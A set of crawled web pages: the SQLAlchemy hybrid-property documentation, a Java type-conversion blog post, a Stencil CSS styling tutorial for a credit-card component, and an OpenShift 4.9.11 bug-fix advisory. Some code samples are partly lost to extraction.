self.start + value @length.update_expression def length(cls, value): return [ (cls.end, cls.start + value) ] Above, if we use Interval.length in an UPDATE expression as: session.query(Interval).update( {Interval.length: 25}, synchronize_session='fetch') We’ll get an UPDATE statement along the lines of: UPDATE interval SET end=start + :value In some cases, the default “evaluate” strategy can’t perform the SET expression in Python; while the addition operator we’re using above is supported, for more complex SET expressions it will usually be necessary to use either the “fetch” or False synchronization strategy as illustrated above. Note For ORM bulk updates to work with hybrids, the function name of the hybrid must match that of how it is accessed. Something like this wouldn’t work: class Interval(object): # ... def _get(self): return self.end - self.start def _set(self, value): self.end = self.start + value def _update_expr(cls, value): return [ (cls.end, cls.start + value) ] length = hybrid_property( fget=_get, fset=_set, update_expr=_update_expr ) The Python descriptor protocol does not provide any reliable way for a descriptor to know what attribute name it was accessed as, and the UPDATE scheme currently relies upon being able to access the attribute from an instance by name in order to perform the instance synchronization step. New in version 1.2: added support for bulk updates to hybrid properties. Working with Relationships¶ There’s no essential difference when creating hybrids that work with related objects as opposed to column-based data. The need for distinct expressions tends to be greater. The two variants we’ll illustrate are the “join-dependent” hybrid, and the “correlated subquery” hybrid. Join-Dependent Relationship Hybrid¶ Consider the following declarative mapping which relates a User to a SavingsAccount: from sqlalchemy import Column, Integer, ForeignKey, Numeric, String from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.ext.hybrid import hybrid_property): if self.accounts: return self.accounts[0].balance else: return None @balance.setter def balance(self, value): if not self.accounts: account = Account(owner=self) else: account = self.accounts[0] account.balance = value @balance.expression def balance(cls): return SavingsAccount.balance The above hybrid property balance works with the first SavingsAccount entry in the list of accounts for this user. The in-Python getter/setter methods can treat accounts as a Python list available on self. However, at the expression level, it’s expected that the User class will be used in an appropriate context such that an appropriate join to SavingsAccount will be present: >>> print(Session().query(User, User.balance). ... join(User.accounts).filter(User.balance > 5000)) SELECT "user".id AS user_id, "user".name AS user_name, account.balance AS account_balance FROM "user" JOIN account ON "user".id = account.user_id WHERE account.balance > :balance_1 Note however, that while the instance level accessors need to worry about whether self.accounts is even present, this issue expresses itself differently at the SQL expression level, where we basically would use an outer join: >>> from sqlalchemy import or_ >>> print (Session().query(User, User.balance).outerjoin(User.accounts). ... filter(or_(User.balance < 5000, User.balance == None))) SELECT "user".id AS user_id, "user".name AS user_name, account.balance AS account_balance FROM "user" LEFT OUTER JOIN account ON "user".id = account.user_id WHERE account.balance < :balance_1 OR account.balance IS NULL Correlated Subquery Relationship Hybrid¶ We can, of course, forego being dependent on the enclosing query’s usage of joins in favor of the correlated subquery, which can portably be packed into a single column expression. A correlated subquery is more portable, but often performs more poorly at the SQL level. Using the same technique illustrated at Using column_property, we can adjust our SavingsAccount example to aggregate the balances for all accounts, and use a correlated subquery for the column expression: from sqlalchemy import Column, Integer, ForeignKey, Numeric, String from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy import select, func): return sum(acc.balance for acc in self.accounts) @balance.expression def balance(cls): return select(func.sum(SavingsAccount.balance)).\ where(SavingsAccount.user_id==cls.id).\ label('total_balance') The above recipe will give us the balance column which renders a correlated SELECT: >>> print(s.query(User).filter(User.balance > 400)) SELECT "user".id AS user_id, "user".name AS user_name FROM "user" WHERE (SELECT sum(account.balance) AS sum_1 FROM account WHERE account.user_id = "user".id) > :param_1 Building Custom Comparators¶ The hybrid property also includes a helper that allows construction of custom comparators. A comparator object allows one to customize the behavior of each SQLAlchemy expression operator individually. They are useful when creating custom types that have some highly idiosyncratic behavior on the SQL side. Note The hybrid_property.comparator() decorator introduced in this section replaces the use of the hybrid_property.expression() decorator. They cannot be used together. The example class below allows case-insensitive comparisons on the attribute named word_insensitive: from sqlalchemy.ext.hybrid import Comparator, hybrid_property from sqlalchemy import func, Column, Integer, String from sqlalchemy.orm import Session from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() class CaseInsensitiveComparator(Comparator): def __eq__(self, other): return func.lower(self.__clause_element__()) == func.lower(other) class SearchWord(Base): __tablename__ = 'searchword' id = Column(Integer, primary_key=True) word = Column(String(255), nullable=False) @hybrid_property def word_insensitive(self): return self.word.lower() @word_insensitive.comparator def word_insensitive(cls): return CaseInsensitiveComparator(cls.word) Above, SQL expressions against word_insensitive will apply the LOWER() SQL function to both sides: >>> print(Session().query(SearchWord).filter_by(word_insensitive="Trucks")) SELECT searchword.id AS searchword_id, searchword.word AS searchword_word FROM searchword WHERE lower(searchword.word) = lower(:lower_1) The CaseInsensitiveComparator above implements part of the ColumnOperators interface. A “coercion” operation like lowercasing can be applied to all comparison operations (i.e. eq, lt, gt, etc.) using Operators.operate(): class CaseInsensitiveComparator(Comparator): def operate(self, op, other): return op(func.lower(self.__clause_element__()), func.lower(other)) Reusing Hybrid Properties across Subclasses¶ A hybrid can be referred to from a superclass, to allow modifying methods like hybrid_property.getter(), hybrid_property.setter() to be used to redefine those methods on a subclass. This is similar to how the standard Python @property object works:(' ', 1) Above, the FirstNameLastName class refers to the hybrid from FirstNameOnly.name to repurpose its getter and setter for the subclass. When overriding hybrid_property.expression() and hybrid_property.comparator() alone as the first reference to the superclass, these names conflict with the same-named accessors on the class- level QueryableAttribute object returned at the class level. To override these methods when referring directly to the parent class descriptor, add the special qualifier hybrid_property.overrides, which will de- reference the instrumented attribute back to the hybrid object: class FirstNameLastName(FirstNameOnly): # ... last_name = Column(String) @FirstNameOnly.name.overrides.expression def name(cls): return func.concat(cls.first_name, ' ', cls.last_name) New in version 1.2: Added hybrid_property.getter() as well as the ability to redefine accessors per-subclass. Hybrid Value Objects¶ Note in our previous example, if we were to compare the word_insensitive attribute of a SearchWord instance to a plain Python string, the plain Python string would not be coerced to lower case - the CaseInsensitiveComparator we built, being returned by @word_insensitive.comparator, only applies to the SQL side. A more comprehensive form of the custom comparator is to construct a Hybrid Value Object. This technique applies the target value or expression to a value object which is then returned by the accessor in all cases. The value object allows control of all operations upon the value as well as how compared values are treated, both on the SQL expression side as well as the Python value side. Replacing the previous CaseInsensitiveComparator class with a new CaseInsensitiveWord class: class CaseInsensitiveWord(Comparator): "Hybrid value representing a lower case representation of a word." def __init__(self, word): if isinstance(word, basestring): self.word = word.lower() elif isinstance(word, CaseInsensitiveWord): self.word = word.word else: self.word = func.lower(word) def operate(self, op, other): if not isinstance(other, CaseInsensitiveWord): other = CaseInsensitiveWord(other) return op(self.word, other.word) def __clause_element__(self): return self.word def __str__(self): return self.word key = 'word' "Label to apply to Query tuple results" Above, the CaseInsensitiveWord object represents self.word, which may be a SQL function, or may be a Python native. By overriding operate() and __clause_element__() to work in terms of self.word, all comparison operations will work against the “converted” form of word, whether it be SQL side or Python side. Our SearchWord class can now deliver the CaseInsensitiveWord object unconditionally from a single hybrid call: class SearchWord(Base): __tablename__ = 'searchword' id = Column(Integer, primary_key=True) word = Column(String(255), nullable=False) @hybrid_property def word_insensitive(self): return CaseInsensitiveWord(self.word) The word_insensitive attribute now has case-insensitive comparison behavior universally, including SQL expression vs. Python expression (note the Python value is converted to lower case on the Python side here): >>> print(Session().query(SearchWord).filter_by(word_insensitive="Trucks")) SELECT searchword.id AS searchword_id, searchword.word AS searchword_word FROM searchword WHERE lower(searchword.word) = :lower_1 SQL expression versus SQL expression: >>> sw1 = aliased(SearchWord) >>> sw2 = aliased(SearchWord) >>> print(Session().query( ... sw1.word_insensitive, ... sw2.word_insensitive).\ ... filter( ... sw1.word_insensitive > sw2.word_insensitive ... )) SELECT lower(searchword_1.word) AS lower_1, lower(searchword_2.word) AS lower_2 FROM searchword AS searchword_1, searchword AS searchword_2 WHERE lower(searchword_1.word) > lower(searchword_2.word) Python only expression: >>> ws1 = SearchWord(word="SomeWord") >>> ws1.word_insensitive == "sOmEwOrD" True >>> ws1.word_insensitive == "XOmEwOrX" False >>> print(ws1.word_insensitive) someword The Hybrid Value pattern is very useful for any kind of value that may have multiple representations, such as timestamps, time deltas, units of measurement, currencies and encrypted passwords. See also Hybrids and Value Agnostic Types - on the techspot.zzzeek.org blog Value Agnostic Types, Part II - on the techspot.zzzeek.org blog Building Transformers¶ A transformer is an object which can receive a Query object and return a new one. The Query object includes a method with_transformation() that returns a new Query transformed by the given function. We can combine this with the Comparator class to produce one type of recipe which can both set up the FROM clause of a query as well as assign filtering criterion. Consider a mapped class Node, which assembles using adjacency list into a hierarchical tree pattern: from sqlalchemy import Column, Integer, ForeignKey from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() class Node(Base): __tablename__ = 'node' id = Column(Integer, primary_key=True) parent_id = Column(Integer, ForeignKey('node.id')) parent = relationship("Node", remote_side=id) Suppose we wanted to add an accessor grandparent. This would return the parent of Node.parent. When we have an instance of Node, this is simple: from sqlalchemy.ext.hybrid import hybrid_property class Node(Base): # ... @hybrid_property def grandparent(self): return self.parent.parent For the expression, things are not so clear. We’d need to construct a Query where we Query.join() twice along Node.parent to get to the grandparent. We can instead return a transforming callable that we’ll combine with the Comparator class to receive any Query object, and return a new one that’s joined to the Node.parent attribute and filtered based on the given criterion: from sqlalchemy.ext.hybrid import Comparator class GrandparentTransformer(Comparator): def operate(self, op, other): def transform(q): cls = self.__clause_element__() parent_alias = aliased(cls) return q.join(parent_alias, cls.parent).\ filter(op(parent_alias.parent, other)) return transform Base = declarative_base() class Node(Base): __tablename__ = 'node' id = Column(Integer, primary_key=True) parent_id = Column(Integer, ForeignKey('node.id')) parent = relationship("Node", remote_side=id) @hybrid_property def grandparent(self): return self.parent.parent @grandparent.comparator def grandparent(cls): return GrandparentTransformer(cls) The GrandparentTransformer overrides the core Operators.operate() method at the base of the Comparator hierarchy to return a query- transforming callable, which then runs the given comparison operation in a particular context. Such as, in the example above, the operate method is called, given the Operators.eq callable as well as the right side of the comparison Node(id=5). A function transform is then returned which will transform a Query first to join to Node.parent, then to compare parent_alias using Operators.eq against the left and right sides, passing into Query.filter(): >>> from sqlalchemy.orm import Session >>> session = Session() sql>>> session.query(Node).\ ... with_transformation(Node.grandparent==Node(id=5)).\ ... all()SELECT node.id AS node_id, node.parent_id AS node_parent_id FROM node JOIN node AS node_1 ON node_1.id = node.parent_id WHERE :param_1 = node_1.parent_id We can modify the pattern to be more verbose but flexible by separating the “join” step from the “filter” step. The tricky part here is ensuring that successive instances of GrandparentTransformer use the same AliasedClass object against Node. Below we use a simple memoizing approach that associates a GrandparentTransformer with each class: class Node(Base): # ... @grandparent.comparator def grandparent(cls): # memoize a GrandparentTransformer # per class if '_gp' not in cls.__dict__: cls._gp = GrandparentTransformer(cls) return cls._gp class GrandparentTransformer(Comparator): def __init__(self, cls): self.parent_alias = aliased(cls) @property def join(self): def go(q): return q.join(self.parent_alias, Node.parent) return go def operate(self, op, other): return op(self.parent_alias.parent, other) The “transformer” pattern is an experimental pattern that starts to make usage of some functional programming paradigms. While it’s only recommended for advanced and/or patient developers, there’s probably a whole lot of amazing things it can be used for. API Reference¶ - class sqlalchemy.ext.hybrid.hybrid_method(func, expr=None)¶ A decorator which allows definition of a Python object method with both instance-level and class-level behavior. Class signature class sqlalchemy.ext.hybrid.hybrid_method( sqlalchemy.orm.base.InspectionAttrInfo) - method sqlalchemy.ext.hybrid.hybrid_method.__init__(func, expr=None)¶ Create a new hybrid_method. Usage is typically via decorator: from sqlalchemy.ext.hybrid import hybrid_method class SomeClass(object): @hybrid_method def value(self, x, y): return self._value + x + y @value.expression def value(self, x, y): return func.some_function(self._value, x, y) - method sqlalchemy.ext.hybrid.hybrid_method.expression(expr)¶ Provide a modifying decorator that defines a SQL-expression producing method. - attribute sqlalchemy.ext.hybrid.hybrid_method.extension_type = symbol('HYBRID_METHOD')¶ The extension type, if any. Defaults to NOT_EXTENSION - class sqlalchemy.ext.hybrid.hybrid_property(fget, fset=None, fdel=None, expr=None, custom_comparator=None, update_expr=None)¶ A decorator which allows definition of a Python descriptor with both instance-level and class-level behavior. Class signature class sqlalchemy.ext.hybrid.hybrid_property( sqlalchemy.orm.base.InspectionAttrInfo) - method sqlalchemy.ext.hybrid.hybrid_property.__init__(fget, fset=None, fdel=None, expr=None, custom_comparator=None, update_expr=None)¶ Create a new hybrid_property. Usage is typically via decorator: from sqlalchemy.ext.hybrid import hybrid_property class SomeClass(object): @hybrid_property def value(self): return self._value @value.setter def value(self, value): self._value = value - method sqlalchemy.ext.hybrid.hybrid_property.comparator(comparator)¶ Provide a modifying decorator that defines a custom comparator producing method. The return value of the decorated method should be an instance of Comparator. Note The hybrid_property.comparator()decorator replaces the use of the hybrid_property.expression()decorator. They cannot be used together. When a hybrid is invoked at the class level, the Comparatorobject comparator object passed in. Note When referring to a hybrid property from an owning class (e.g. SomeClass.some_hybrid), an instance of QueryableAttributeis returned, representing the expression or comparator object as this hybrid object. However, that object itself has accessors called expressionand comparator; so when attempting to override these decorators on a subclass, it may be necessary to qualify it using the hybrid_property.overridesmodifier first. See that modifier for details. - method sqlalchemy.ext.hybrid.hybrid_property.deleter(fdel)¶ Provide a modifying decorator that defines a deletion method. - method sqlalchemy.ext.hybrid.hybrid_property.expression(expr)¶ Provide a modifying decorator that defines a SQL-expression producing method. When a hybrid is invoked at the class level, the SQL expression SQL expression passed in. Note When referring to a hybrid property from an owning class (e.g. SomeClass.some_hybrid), an instance of QueryableAttributeis returned, representing the expression or comparator object as well as this hybrid object. However, that object itself has accessors called expressionand comparator; so when attempting to override these decorators on a subclass, it may be necessary to qualify it using the hybrid_property.overridesmodifier first. See that modifier for details. - attribute sqlalchemy.ext.hybrid.hybrid_property.extension_type = symbol('HYBRID_PROPERTY')¶ The extension type, if any. Defaults to NOT_EXTENSION - method sqlalchemy.ext.hybrid.hybrid_property.getter(fget)¶ Provide a modifying decorator that defines a getter method. New in version 1.2. - attribute sqlalchemy.ext.hybrid.hybrid_property.overrides¶ Prefix for a method that is overriding an existing attribute. The hybrid_property.overridesaccessor just returns this hybrid object, which when called at the class level from a parent class, will de-reference the “instrumented attribute” normally returned at this level, and allow modifying decorators like hybrid_property.expression()and hybrid_property.comparator()to be used without conflicting with the same-named attributes normally present on the QueryableAttribute: class SuperClass(object): # ... @hybrid_property def foobar(self): return self._foobar class SubClass(SuperClass): # ... @SuperClass.foobar.overrides.expression def foobar(cls): return func.subfoobar(self._foobar) New in version 1.2. - method sqlalchemy.ext.hybrid.hybrid_property.setter(fset)¶ Provide a modifying decorator that defines a setter method. - method sqlalchemy.ext.hybrid.hybrid_property.update_expression(meth)¶ Provide a modifying decorator that defines an UPDATE tuple producing method. The method accepts a single value, which is the value to be rendered into the SET clause of an UPDATE statement. The method should then process this value into individual column expressions that fit into the ultimate SET clause, and return them as a sequence of 2-tuples. Each tuple contains a column expression as the key and a value to be rendered. E.g.: class Person(Base): # ... first_name = Column(String) last_name = Column(String) @hybrid_property def fullname(self): return first_name + " " + last_name @fullname.update_expression def fullname(cls, value): fname, lname = value.split(" ", 1) return [ (cls.first_name, fname), (cls.last_name, lname) ] New in version 1.2. - class sqlalchemy.ext.hybrid.Comparator(expression)¶ A helper class that allows easy construction of custom PropComparatorclasses for usage with hybrids. Class signature class sqlalchemy.ext.hybrid.Comparator( sqlalchemy.orm.PropComparator) - sqlalchemy.ext.hybrid.HYBRID_METHOD = symbol('HYBRID_METHOD')¶ Symbol indicating an InspectionAttrthat’s of type hybrid_method. Is assigned to the InspectionAttr.extension_typeattribute. See also Mapper.all_orm_attributes - sqlalchemy.ext.hybrid.HYBRID_PROPERTY = symbol('HYBRID_PROPERTY')¶ - Symbol indicating an InspectionAttrthat’s of type hybrid_method. Is assigned to the InspectionAttr.extension_typeattribute. See also Mapper.all_orm_attributes flambé! the dragon and The Alchemist image designs created and generously donated by Rotem Yaari.Created using Sphinx 4.5.0.
https://docs.sqlalchemy.org/en/14/orm/extensions/hybrid.html
CC-MAIN-2022-21
en
refinedweb
Some of our test data needs to be transformed from its original type to something else. For example, we might need to convert a String to a numeric value, or vice versa. Or we might need to generate date values in a certain format. Examples for all of these can be found below. String to int The code Integer.parseInt(theString) Assign to variable of type int Example int resultingInt = Integer.parseInt("6"); Value stored in the variable 6 Int to String The code String.valueOf(theInt) Assign to variable of type String Example String resultingString = String.valueOf(200); Value stored in the variable 200 String to Double The code Double.parseDouble(theString) Assign to variable of type String Example double resultingDouble = Double.parseDouble("333.55"); Value stored in variable 333.55 Double to String The code String.valueOf(theDouble) Store to variable of type String Example String resultingString = String.valueOf(333.55); Value stored in variable 333.55 Note: String.valueOf() can also be used to convert float and long values to String. Similarly, to convert String values to float you can use Float.parseFloat(), or Long.parseLong() to convert String values to long. Time/date formatting When working with Dates, we usually want to convert a Date value to a specific format. This can be done in Java 8 and above using DateTimeFormatter. For example, we might want to generate the current date and time, but in the format “yyyy-MM-dd HH:mm:ss”, and to save this value to a String variable. That is year-month-day hour(in 24 hours format)-minutes-seconds. To generate the current time, several approaches can be used. The first one exemplified below uses ‘LocalDateTime.now()’. To use Java’s LocalDateTime and DateTimeFormatter in a test, we need to add the following imports to the test class: import java.time.LocalDateTime; import java.time.format.DateTimeFormatter; The code used for generating the date and time in the desired format as String is: String formattedDate = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss").format(LocalDateTime.now()); The resulting String looks like: 2019-11-05 20:22:47 In case we are only interested in the year, month and day, we can omit the hour/minute/second part of the pattern used with DateTimeFormatter, as follows: String formattedWithoutHour = DateTimeFormatter.ofPattern("yyyy-MM-dd").format(LocalDateTime.now()); In this case the result looks like: 2019-10-21 GitHub location of examples One thought on “Useful type conversions”
https://imalittletester.com/2019/10/09/useful-type-conversions/?shared=email&msg=fail
CC-MAIN-2022-21
en
refinedweb
No matter what kind of component you’re building, every component needs styles. In this tutorial, we’re going to take a deep dive into styling components using Stencil. We’ll learn how to implement global styles in Stencil, which helps us keep our components visually consistent when building a design system. We’ll also cover a lot of exciting CSS topics like gradients, animations, pseudo-elements, and more — so if that sounds interesting to you, let’s jump on in! You can find all of the code for this tutorial at the Stencil CSS Github repository here. NOTE: This tutorial assumes that you have a fundamental understanding of building components in Stencil. This tutorial will emphasize the CSS related aspects of building a component in Stencil. Creating Our Stencil Component To illustrate all of these CSS topics, we’re going to be building a credit card component. This kind of component could be used to display a user’s stored credit cards, or can even be modified to serve as a fun way to input credit card information. Here’s what the final component will look like. Speaking of the final component, let’s take a look at what the final component will look like when used in HTML: <credit-card</credit-card> As you can see, our credit card component is going to have five properties. The first four props, card-number, card-holder, expiration-date, and cvv, are all aspects of a credit card that vary from card to card. The final prop, gradient, will be used to specify which gradient background we want to use for the credit card. We’ll discuss in more detail how this will work later in the tutorial. Keeping this in mind, let’s create a new Stencil component and take in these values as props. @Component({ tag: 'credit-card', styleUrl: 'credit-card.css', shadow: true, }) export class CreditCard { @Prop() cardNumber: string; @Prop() cardHolder: string; @Prop() expirationDate: string; @Prop() cvv: string; @Prop() gradient: 'purple' | 'green' | 'orange'; Because our component is largely presentational, we’ll take in all of these values as strings so we can display them on our credit card. Next, let’s write our JSX to create the structure of our credit card. render() { return ( <Host> <a href="/" class="card-wrapper"> <div class="front"> <div class="row"> <p>Credit</p> <img src=" alt="logo" /> </div> <div class="row"> {this.cardNumber.split(' ').map(number => ( <p class="card-number">{number}</p> ))} </div> <div class="row"> <p class="cardholder">{this.cardHolder}</p> <p class="exp-date">{this.expirationDate}</p> </div> </div> <div class="back"> <p>Security Code</p> <p class="cvv">{this.cvv}</p> </div> </a> </Host> ); } One thing to note here is that we are using the split method on the cardNumber to display the cardNumber in groups of four digits. Because we use a space (‘ ‘) as our delimiter, the cardNumber has to be set with a space after every four digits. The rest of the JSX just displays the values we took as props in an organized way. With our props and jsx set, we’re ready to get into the fun part…styling! Global Styles When building out a design system, we want most of our styles to be directly tied to our components. This ensures that our components are modular, which makes them easier to manage, debug, and scale. However, there are some styles that we want to share between our components in order to have a consistent look and feel across our design system. The styles you decide to share across components are entirely up to you, but usually they include things like colors, typography, spacing, etc. In order for us to share these styles across our design system, we need global styles. These global styles will be made available to all our components for consistency. Fortunately for us, Stencil has built in support for a global stylesheet. Here’s how we can create a global stylesheet: - Create a new folder called globalunder the srcdirectory of your Stencil project - Create a new file called global.cssin the globalfolder you just created - In your stencil.config.tsfile, specify the global style option globalStyle: 'src/global/global.css' - In the head of your index.htmlfile, add a link to your global stylesheet <link rel="stylesheet" href="/build/{YOUR_PROJECT_NAME}.css" />. Be sure to replace {YOUR_PROJECT_NAME}with the name of your Stencil project. Now our global styles are available for us to use! So now let’s open up global.css and add some styles. @import url(' html, body { font-family: 'Roboto', sans-serif; } :root { --font-color: #fff; --purple-gradient: linear-gradient(to right bottom, #a460f8, #4c48ff); --green-gradient: linear-gradient(to right bottom, #20e3b2, #0bc2c2); --orange-gradient: linear-gradient(to right bottom, #f9b523, #ff4e50); } The first thing we are doing here is importing the “Roboto” font from Google fonts. With this font imported, we can use it across our entire design system by setting the font-family of our html and body. In addition, we are declaring a few CSS variables on the :root of our project. These variables are really useful for ensuring that all our components use the same values for their styling. In our case, we are creating some variables for our font color as well as some gradients that will serve as the background of our credit cards. This setup provides us a lot of flexibility for the future. In the event we want to tweak any of these gradients, we can change them in our global styles and the change will propagate to any component that references that variable. Styling the Component Alright, we’ve got our global styles and the structure of our credit card component. Let’s start styling the component itself. Within the Host element, our credit card is composed of three main parts: a front, a back, and a wrapper for these two sides. Our wrapper is an anchor tag with a class of card-wrapper. Let’s open credit-card.css and style this first. .card-wrapper { display: block; width: fit-content; } Here, we are making the card a block-level element and fitting the width to its content (the front and back). Next, let’s style the front and back of the card. Naturally, the front and back will share a lot of styles, so let’s select both of them and specify the common styles. .front, .back { width: 400px; height: 200px; padding: 20px; border-radius: 8px; font-size: 1.125rem; display: flex; flex-direction: column; box-shadow: 4px 8px 24px rgba(0, 0, 0, 0.25); } Next, we can specify the styles unique to the front and back of the card. These styles are used to organize the layout of the content on each side of the card. Both sides already use flexbox and have set the direction to be columnwise, so now we can use justify-content and align-items to organize the children on each side. For the front, we’ll add space between the children, and for the back we’ll put the children in the bottom right corner. .front { justify-content: space-between; } .back { justify-content: flex-end; align-items: flex-end; } Finally, we can add some small changes to our row class to put space between the elements in each row of the credit card. We will also increase the font size of the card number, remove margin and padding on <p> tags, and set a reasonable height for our image. .row { display: flex; justify-content: space-between; align-items: center; } .card-number { font-size: 1.75rem; } p { margin: 0; padding: 0; } img { height: 45px; } With these styles, our component is starting to take shape. Here’s what it should look like so far: Adding Gradients Now we get to make use of those fun gradients we set in our global styles! We’re going to let the user choose the gradient, but we want to make sure we limit them to the three gradients we defined. This is why, when we initialized our gradient prop, we set its type to be one of three specific strings. @Prop() gradient: 'purple' | 'green' | 'orange'; We can make these three strings serve as class names, and in doing so, we can map background styles to each class. .purple { background: var(--purple-gradient); } .green { background: var(--green-gradient); } .orange { background: var(--orange-gradient); } These classes won’t have any effect until we add the value of the gradient prop to the front and back of the card as a class using string interpolation. <div class={`front ${this.gradient}`}> //child elements </div> <div class={`back ${this.gradient}`}> //child elements </div> Now we can pass in “purple”, “green”, or “orange” to our gradient prop to use whichever gradient background we prefer. We also want to make use of our --font-color variable. Since we want our entire component to use this font color, we can set it on our card-wrapper. We can also remove the anchor tag’s default underline with text-decoration: none. .card-wrapper { display: block; width: fit-content; color: var(--font-color); text-decoration: none; } Now our component is looking a bit more like our final result: Make it Spin! Our credit card component is looking good, but let’s liven it up a bit by adding some animation. In order for us to add animation to our component, there are a few CSS properties we will have to make use of. Let’s take a look at each of them and what they do. transition– this property allows us to move, or transition, between two styles in a gradual and flowing way, as opposed to an abrupt change. It is actually a shorthand property that allows us to specify the transition property, duration, and more. transform– this property allows us to modify, or transform, an element by translating, scaling, rotating, or skewing it. We’ll use this property to rotate our card and we can do so with the rotateY()function. rotateY()– this function is used to rotate an element around the Y axis. It takes a parameter that represents the angle of rotation. backface-visibility– this property allows us to set whether or not the back of an element is visible when it faces the user perspective– perhaps the hardest to reason about, this property sets the distance between the screen and the user to create a 3D effect. It will make more sense when we see it in action. With these properties in mind, the first thing we want to do is spin the card. To do that, we can use the transform property and the rotateY() function to turn the card 180 degrees. Because we only want to spin the card when we hover over it or focus on it, we’ll use the :hover and :focus pseudo-classes to specify that. .card-wrapper:hover .front, .card-wrapper:focus .front { transform: rotateY(180deg); } As a quick aside, we are using the :focuspseudo-class in addition to :hoverfor accessibility purposes. Now, when a user focuses on the credit card element with a screen reader, the contents of the front and back of the card will be read aloud. While this transformation does work, it has a few issues. First, the change is very abrupt. We can fix this by using the transition property. To use the transition property, we need to provide the property we want to animate and the duration of the animation. For our case, we want to create a transition for the transform property and we will give it a duration of 500 ms. The second issue is that when the card rotates, the card contents become flipped around, as if we’re looking through the card from the back. While this has its use cases, we want to hide this side of the card when it turns. We can do this by using the backface-visibility property and setting it to hidden. These fixes will need to be made for both the front and the back of the card, so let’s add these changes where we target both the front and back class. .front, .back { width: 400px; height: 200px; padding: 20px; border-radius: 8px; font-size: 1.125rem; display: flex; flex-direction: column; box-shadow: 4px 8px 24px rgba(0, 0, 0, 0.25); transition: transform 500ms; backface-visibility: hidden; } Okay, the front of our card is animated. Now, let’s do the same to the back of the card. The back of the card should start out hidden, and rotate into view when we hover over the card. To do this, we can apply a transformation to rotate the card -180 degrees initially. A negative angle of rotation means the element will rotate counterclockwise. Because the backface-visibility is already set to hidden this rotation will make the back of the card invisible to start. .back { justify-content: flex-end; align-items: flex-end; transform: rotateY(-180deg); } When we hover over the card or focus on it, the front rotates out of view. To rotate the back into view at the same time, we can rotate the back of the card back to 0 degrees. .card-wrapper:hover .back, .card-wrapper:focus .back { transform: rotateY(0deg); } Almost there! The back of our card rotates on hover and focus, but we still need to position it in the correct location. Up until now, the back of the card has sat under the front of the card, but we want it to sit behind the front of the card. To do this, we can use absolute positioning. If we set the card wrapper to have a position of relative, we can give the card back a position of absolute to position it relative to the card wrapper like so. .card-wrapper { display: block; width: fit-content; color: var(--font-color); text-decoration: none; position: relative; } .back { position: absolute; top: 0; left: 0; justify-content: flex-end; align-items: flex-end; transform: rotateY(-180deg); } Finally, we need to set the perspective on our card wrapper to create a 3D effect. I’ve chosen a value of 3000px, which makes the effect fairly subtle, but feel free to play around with different values to see how the perspective property works. It becomes clearer the smaller the value. .card-wrapper { display: block; width: fit-content; color: var(--font-color); text-decoration: none; position: relative; perspective: 3000px; } Final Touch The last visual aspect of our credit card component is the magnetic strip. This is the black bar that runs across the back of the credit card. Because this element is purely decorative and doesn’t contain any content, we can build it using the ::before pseudo-element. ::before inserts content as the first child of the element we attach the selector to. This content, however, is not actually part of the DOM, making it a great tool for adding decorative content like this. To build the magnetic strip, we can add content as a child of the back of the card, and style it to look like a magnetic strip. .back::before { content: ''; display: block; position: absolute; top: 50px; left: 0; right: 0; width: 100%; height: 40px; background: rgba(0, 0, 0, 0.5); } And with that, our credit card component is complete! As you can see, there is so much you can do with CSS in Stencil, and this only scratches the surface of what’s possible. When it comes to building a design system, it is critically important to have components that are visually consistent. You can use these design elements to build other components that complement this one. I’d love to see what cool visual effects you have implemented in your Stencil components. Leave a comment below. I’m always excited to see what you build. 😀
https://ionicframework.com/blog/advanced-stencil-component-styling/
CC-MAIN-2022-21
en
refinedweb
- Issued: - 2021-12-13 - Updated: - 2021-12-13 RHBA-2021:5003 - Bug Fix Advisory Synopsis OpenShift Container Platform 4.9.11 bug fix update Type/Severity Bug Fix Advisory Topic Red Hat OpenShift Container Platform release 4.9.11..11-x86_64 The image digest is sha256:0f72e150329db15279a1aeda1286c9495258a4892bc5bf1bf5bb89942cd432de (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.11-s390x The image digest is sha256:21fc2e5429882e17e444704aa46da3ca65478bf78379e0bb56c676a7a138b529 (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.11-ppc64le The image digest is sha256:d33109f887e8fa4562a509a9b5623c67107763307ac77ea30ba52821062c6200 - 2010374 - Multicast is broken across nodes - BZ - 2015503 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting - BZ - 2017881 - multus: add handling of pod UIDs passed from runtime - BZ - 2022866 - Support containers with name:tag@digest - BZ - 2023220 - ACL for a deleted egressfirewall still present on node join switch - BZ - 2023836 - [4.9.z] use the rhcos-4.9 branch of fedora-coreos-config for the git submodule when building RHCOS 4.9 - BZ - 2024048 - OLM fails to upgrade operators immediately - BZ - 2024751 - pod-identity-webhook starts without tls - BZ - 2024773 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy - BZ - 2025082 - ACM policy object generated by PolicyGen conflicting with OLM Operator - BZ - 2025697 - Update Azure Machine Spec API to accept Marketplace Images - BZ - 2025937 - KMS resources not getting created for IBM FlashSystem storage - BZ - 2026219 - Detail page is breaking for namespace store , backing store and bucket class. - BZ - 2026302 - Egress IP breaks when network policies are applied - BZ - 2026379 - aws-pod-identity-webhook go.mod version out of sync with build environment - BZ - 2026618 - Downgrade support level for extended control plane integration to Dev Preview - BZ - 2027485 - [4.9z] AddressManager should not call sync() from ErrorCallback - BZ - 2027637 - (release-4.9) Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions - BZ - 2027672 - dpdk application with vhost-net is not able to start - BZ - 2027864 - [4.9z] [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level - BZ - 2027983 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade - Backport to 4.9 - BZ - 2028535 - Backing Store YAML tab on click displays a blank screen on UI - BZ - 2028611 - Installer doesn't retry on GCP rate limiting - BZ - 2028961 - daemonset openshift-kube-proxy/openshift-kube-proxy to have maxUnavailable 10% or 33% - BZ - 